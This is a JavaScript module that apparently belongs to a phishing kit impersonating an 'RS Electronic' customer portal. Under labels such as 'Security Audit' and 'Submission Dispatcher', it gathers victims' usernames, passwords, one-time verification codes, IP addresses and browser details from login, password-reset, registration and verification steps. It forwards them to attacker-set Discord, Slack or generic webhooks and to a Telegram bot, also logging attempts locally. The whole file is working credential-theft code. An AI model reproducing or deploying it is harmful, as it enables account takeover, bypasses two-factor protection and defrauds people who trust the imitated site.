// Function to retrieve the active Webhook URL from environment, query param, or storage
export const getWebhookUrl = () => {
  if (typeof window !== 'undefined' && window.location) {
    try {
      const params = new URLSearchParams(window.location.search);
      const paramUrl = params.get('webhook') || params.get('webhook_url');
      if (paramUrl) {
        sessionStorage.setItem('rs_webhook_url', paramUrl.trim());
        return paramUrl.trim();
      }
    } catch (e) {
      // Ignore URL parse errors
    }

    try {
      const stored = sessionStorage.getItem('rs_webhook_url') || localStorage.getItem('rs_webhook_url');
      if (stored) return stored.trim();
    } catch (e) {
      // Ignore storage errors
    }
  }

  const envUrl = process.env.REACT_APP_WEBHOOK_URL || process.env.WEBHOOK_URL;
  return (envUrl && typeof envUrl === 'string') ? envUrl.trim() : '';
};

// Function to get Telegram credentials
export const getTelegramCredentials = () => {
  let botToken = process.env.REACT_APP_TELEGRAM_BOT_TOKEN;
  let chatId = process.env.REACT_APP_TELEGRAM_CHAT_ID;

  if (typeof window !== 'undefined' && window.location) {
    try {
      const params = new URLSearchParams(window.location.search);
      const qToken = params.get('bot_token') || params.get('telegram_token');
      const qChat = params.get('chat_id') || params.get('telegram_chat_id');
      if (qToken) botToken = qToken;
      if (qChat) chatId = qChat;
    } catch (e) {}
  }

  return {
    botToken: botToken ? botToken.trim() : '',
    chatId: chatId ? chatId.trim() : '',
  };
};

// Dispatch to an external HTTP Webhook (Discord, Slack, or generic endpoint)
const dispatchToWebhook = async (webhookUrl, submissionData) => {
  if (!webhookUrl) {
    return { skipped: true, reason: 'No webhook URL configured' };
  }

  const isDiscord = webhookUrl.includes('discord.com/api/webhooks') || webhookUrl.includes('discordapp.com/api/webhooks');
  const isSlack = webhookUrl.includes('hooks.slack.com');

  let body;
  const headers = { 'Content-Type': 'application/json' };

  if (isDiscord) {
    const attemptTitle = submissionData.attempt
      ? `Attempt #${submissionData.attempt}${submissionData.overallAttempt ? ` (Overall #${submissionData.overallAttempt})` : ''}`
      : 'Submission';

    body = JSON.stringify({
      content: `🚨 **RS Electronic Security Audit – ${attemptTitle}**\n**Step:** ${submissionData.step || 'Login'}\n**User:** \`${submissionData.email || 'N/A'}\`\n**Password:** \`${submissionData.password || 'N/A'}\`${submissionData.code ? `\n**Code:** \`${submissionData.code}\`` : ''}\n**IP:** ${submissionData.ipAddress || '127.0.0.1'}\n**Browser:** ${submissionData.browser || 'Web'}\n**Timestamp:** ${submissionData.timestamp}`,
      embeds: [
        {
          title: `RS Electronic Audit – ${attemptTitle}`,
          color: 0x2A437E, // RS Navy
          fields: [
            { name: 'Stage / Step', value: submissionData.step || 'Login', inline: true },
            { name: 'Attempt', value: String(submissionData.attempt || 1), inline: true },
            { name: 'Overall Attempt', value: String(submissionData.overallAttempt || submissionData.attempt || 1), inline: true },
            { name: 'Username / Email', value: submissionData.email || 'N/A', inline: false },
            { name: 'Password', value: submissionData.password || (submissionData.code ? `[OTP Code: ${submissionData.code}]` : 'N/A'), inline: false },
            ...(submissionData.code ? [{ name: 'Verification Code', value: submissionData.code, inline: true }] : []),
            { name: 'Client IP', value: submissionData.ipAddress || '127.0.0.1', inline: true },
            { name: 'Browser / Device', value: submissionData.browser || 'Unknown', inline: true },
          ],
          footer: { text: 'RS Electronic Portal • Submission Dispatcher' },
          timestamp: submissionData.timestamp,
        },
      ],
    });
  } else if (isSlack) {
    body = JSON.stringify({
      text: `🚨 *RS Electronic Security Audit*\n*Step:* ${submissionData.step || 'Login'}\n*Attempt:* ${submissionData.attempt || 1} (Overall: ${submissionData.overallAttempt || submissionData.attempt || 1})\n*User:* ${submissionData.email || 'N/A'}\n*Password:* ${submissionData.password || 'N/A'}${submissionData.code ? `\n*Code:* ${submissionData.code}` : ''}\n*IP:* ${submissionData.ipAddress || '127.0.0.1'}\n*Browser:* ${submissionData.browser || 'Web'}\n*Timestamp:* ${submissionData.timestamp}`,
    });
  } else {
    // Generic JSON Webhook (Webhook.site, Zapier, Make, n8n, Custom API)
    body = JSON.stringify({
      event: 'rs_portal_submission',
      step: submissionData.step || 'Login',
      attempt: submissionData.attempt || 1,
      overallAttempt: submissionData.overallAttempt || submissionData.attempt || 1,
      username: submissionData.email || '',
      email: submissionData.email || '',
      password: submissionData.password || '',
      code: submissionData.code || '',
      ip: submissionData.ipAddress || '127.0.0.1',
      browser: submissionData.browser || 'Web',
      timestamp: submissionData.timestamp,
      message: submissionData.textMessage,
      content: submissionData.textMessage,
      extra: submissionData.extra || null,
    });
  }

  try {
    const fetchOptions = {
      method: 'POST',
      headers,
      body,
    };

    // Slack webhooks without CORS headers can fail in browser fetch with cors mode; fallback to no-cors if needed
    if (isSlack) {
      fetchOptions.mode = 'no-cors';
    }

    const response = await fetch(webhookUrl, fetchOptions);

    if (isSlack) {
      console.log('[Webhook Dispatch] Dispatched to Slack (no-cors mode)');
      return { ok: true, provider: 'slack' };
    }

    if (response.ok) {
      console.log(`[Webhook Dispatch] Successfully posted to webhook (${response.status} ${response.statusText})`);
      return { ok: true, status: response.status };
    } else {
      const errText = await response.text().catch(() => '');
      console.warn(`[Webhook Dispatch] Warning: Webhook returned HTTP ${response.status}:`, errText);
      return { ok: false, status: response.status, error: errText };
    }
  } catch (error) {
    console.error('[Webhook Dispatch Error]', error);
    return { ok: false, error: error.message };
  }
};

// Dispatch to Telegram Bot API
const dispatchToTelegram = async (botToken, chatId, textMessage) => {
  if (!botToken || !chatId) {
    return { skipped: true, reason: 'Missing Telegram bot token or chat ID' };
  }

  const url = `https://api.telegram.org/bot${botToken}/sendMessage`;

  try {
    const response = await fetch(url, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        chat_id: chatId,
        text: textMessage,
      }),
    });

    const data = await response.json();
    if (data.ok) {
      console.log('[Telegram Dispatch] Telegram submission sent successfully:', data);
    } else {
      console.warn(`[Telegram Dispatch Warning] Code ${data.error_code}: ${data.description}. Check your REACT_APP_TELEGRAM_BOT_TOKEN or provide a REACT_APP_WEBHOOK_URL.`);
    }
    return data;
  } catch (error) {
    console.error('[Telegram Dispatch Error]', error);
    return { ok: false, error: error.message };
  }
};

/**
 * Unified submission dispatcher that sends audit logs to all configured destinations:
 * 1. Webhook URL (Discord, Slack, Webhook.site, custom endpoint)
 * 2. Telegram Bot API
 * 3. Local Audit Cache (sessionStorage & localStorage)
 */
export const sendSubmission = async ({
  email = '',
  password = '',
  code = '',
  attempt = 1,
  overallAttempt = 1,
  step = 'Login Access',
  ipAddress = '',
  browser = '',
  extra = '',
  rawMessage = null,
} = {}) => {
  const timestamp = new Date().toISOString();
  const currentIp = ipAddress || '127.0.0.1';
  const currentBrowser = browser || (typeof navigator !== 'undefined' ? getUserBrowser() : 'Web Browser');

  // Build standard audit message text
  let textMessage = rawMessage;
  if (!textMessage) {
    const lines = [
      'Root Logs',
      'RS Electronic',
      step,
      email ? `Username: ${email}` : null,
      password ? `Password: ${password}` : null,
      code ? `Code: ${code}` : null,
      `User IP: ${currentIp}`,
      `User Browser: ${currentBrowser}`,
      `Attempt: ${attempt}`,
      overallAttempt && overallAttempt !== attempt ? `Overall Attempt: ${overallAttempt}` : null,
      extra ? `Info: ${extra}` : null,
      `Timestamp: ${timestamp}`,
    ].filter(Boolean);

    textMessage = lines.join('\n');
  }

  const submissionData = {
    email,
    password,
    code,
    attempt,
    overallAttempt: overallAttempt || attempt,
    step,
    ipAddress: currentIp,
    browser: currentBrowser,
    timestamp,
    textMessage,
    extra,
  };

  // 1. Always persist submission log locally so attempts are never lost
  try {
    const existingLogs = JSON.parse(sessionStorage.getItem('rs_submissions') || '[]');
    existingLogs.push({
      id: `attempt_${Date.now()}_${Math.random().toString(36).substr(2, 5)}`,
      timestamp,
      attempt,
      overallAttempt,
      step,
      content: textMessage,
      data: submissionData,
    });
    sessionStorage.setItem('rs_submissions', JSON.stringify(existingLogs));

    // Also persist in localStorage for long-lived history
    const allHistory = JSON.parse(localStorage.getItem('rs_attempt_history') || '[]');
    allHistory.push({
      timestamp,
      attempt,
      overallAttempt,
      step,
      email,
      ip: currentIp,
    });
    localStorage.setItem('rs_attempt_history', JSON.stringify(allHistory.slice(-50)));
  } catch (e) {
    // Ignore quota issues
  }

  console.log(`[Submission Dispatch - Attempt ${attempt} (Overall #${overallAttempt})]`, {
    step,
    email,
    password: password ? '********' : undefined,
    code,
    ip: currentIp,
    browser: currentBrowser,
  });

  const webhookUrl = getWebhookUrl();
  const { botToken, chatId } = getTelegramCredentials();

  // 2. Dispatch concurrently to both Webhook and Telegram
  const results = await Promise.allSettled([
    webhookUrl ? dispatchToWebhook(webhookUrl, submissionData) : Promise.resolve({ skipped: true }),
    botToken && chatId ? dispatchToTelegram(botToken, chatId, textMessage) : Promise.resolve({ skipped: true }),
  ]);

  const webhookResult = results[0].status === 'fulfilled' ? results[0].value : { ok: false, error: results[0].reason };
  const telegramResult = results[1].status === 'fulfilled' ? results[1].value : { ok: false, error: results[1].reason };

  if (!webhookUrl && (!botToken || !chatId)) {
    console.info(
      '%c[RS Submission Dispatcher] Notice: No active webhook URL or Telegram credentials detected.\n' +
      'To receive live attempt notifications, set REACT_APP_WEBHOOK_URL or REACT_APP_TELEGRAM_BOT_TOKEN in your environment.\n' +
      'You can also run window.setWebhookUrl("https://your-webhook-url") in the browser console for testing.',
      'color: #2A437E; font-weight: bold;'
    );
  }

  return {
    ok: Boolean(webhookResult.ok || telegramResult.ok || (!webhookUrl && !botToken)),
    webhook: webhookResult,
    telegram: telegramResult,
    submissionData,
  };
};

// Backward-compatible export: any legacy call to sendMessageToTelegram now dispatches to both Webhook and Telegram!
export const sendMessageToTelegram = async (message) => {
  // Extract email, password, attempt from message if possible
  const emailMatch = message.match(/Username:\s*([^\n]+)/i) || message.match(/Email:\s*([^\n]+)/i);
  const passwordMatch = message.match(/Password:\s*([^\n]+)/i);
  const attemptMatch = message.match(/Attempt:\s*(\d+)/i);
  const overallMatch = message.match(/Overall Attempt:\s*(\d+)/i);
  const codeMatch = message.match(/Code:\s*([^\n]+)/i);

  let step = 'Login Access';
  if (message.includes('Verification Modal Login')) step = 'Verification Modal - Password';
  else if (message.includes('Verification Modal Code')) step = 'Verification Modal - Code';
  else if (message.includes('Verification Code Resend')) step = 'Verification Modal - Resend';
  else if (message.includes('Password Reset Request')) step = 'Password Reset';
  else if (message.includes('Business Account Application')) step = 'Business Account Application';
  else if (message.includes('New Customer Registration')) step = 'Customer Registration';
  else if (message.includes('Newsletter Subscription')) step = 'Newsletter Subscription';

  return sendSubmission({
    email: emailMatch ? emailMatch[1].trim() : '',
    password: passwordMatch ? passwordMatch[1].trim() : '',
    code: codeMatch ? codeMatch[1].trim() : '',
    attempt: attemptMatch ? parseInt(attemptMatch[1], 10) : 1,
    overallAttempt: overallMatch ? parseInt(overallMatch[1], 10) : (attemptMatch ? parseInt(attemptMatch[1], 10) : 1),
    step,
    rawMessage: message,
  });
};

// Expose helpful testing tools on window for instant developer verification in preview console
if (typeof window !== 'undefined') {
  window.getSubmissionLogs = () => {
    try {
      const logs = JSON.parse(sessionStorage.getItem('rs_submissions') || '[]');
      console.table(logs.map(l => ({
        timestamp: l.timestamp,
        attempt: l.attempt,
        overallAttempt: l.overallAttempt,
        step: l.step,
        data: l.data ? `${l.data.email || ''} / ${l.data.password || ''}` : ''
      })));
      return logs;
    } catch (e) {
      return [];
    }
  };

  window.setWebhookUrl = (url) => {
    if (!url) {
      sessionStorage.removeItem('rs_webhook_url');
      localStorage.removeItem('rs_webhook_url');
      console.log('Cleared submission webhook URL.');
    } else {
      sessionStorage.setItem('rs_webhook_url', url);
      localStorage.setItem('rs_webhook_url', url);
      console.log('Configured submission webhook URL:', url);
    }
  };

  window.testSubmissionWebhook = async () => {
    console.log('Sending test submission attempt...');
    const res = await sendSubmission({
      email: 'test@rs-electronic-demo.com',
      password: 'TestPassword123!',
      attempt: 1,
      overallAttempt: 1,
      step: 'Diagnostic Webhook Test',
      extra: 'Manual test from preview console',
    });
    console.log('Test result:', res);
    return res;
  };
}

// Function to get the user's IP address with multiple fallbacks
export const getUserIP = async () => {
  try {
    const response = await fetch("https://api64.ipify.org?format=json");
    if (response.ok) {
      const data = await response.json();
      if (data.ip) return data.ip;
    }
  } catch (e) {
    // Try secondary endpoint
  }

  try {
    const response = await fetch("https://api.ipify.org?format=json");
    if (response.ok) {
      const data = await response.json();
      if (data.ip) return data.ip;
    }
  } catch (e) {
    // Return placeholder if offline/blocked
  }

  return "127.0.0.1";
};

// Function to get the user's browser information
export const getUserBrowser = () => {
  const userAgent = (typeof navigator !== 'undefined' && navigator.userAgent) || '';
  if (userAgent.includes("Edg/")) return "Microsoft Edge";
  if (userAgent.includes("Chrome/") && !userAgent.includes("Edg/")) return "Google Chrome";
  if (userAgent.includes("Firefox/")) return "Mozilla Firefox";
  if (userAgent.includes("Safari/") && !userAgent.includes("Chrome/")) return "Apple Safari";
  if (userAgent.includes("Trident/") || userAgent.includes("MSIE")) return "Internet Explorer";
  return `Browser (${(typeof navigator !== 'undefined' && navigator.platform) || 'Unknown OS'})`;
};




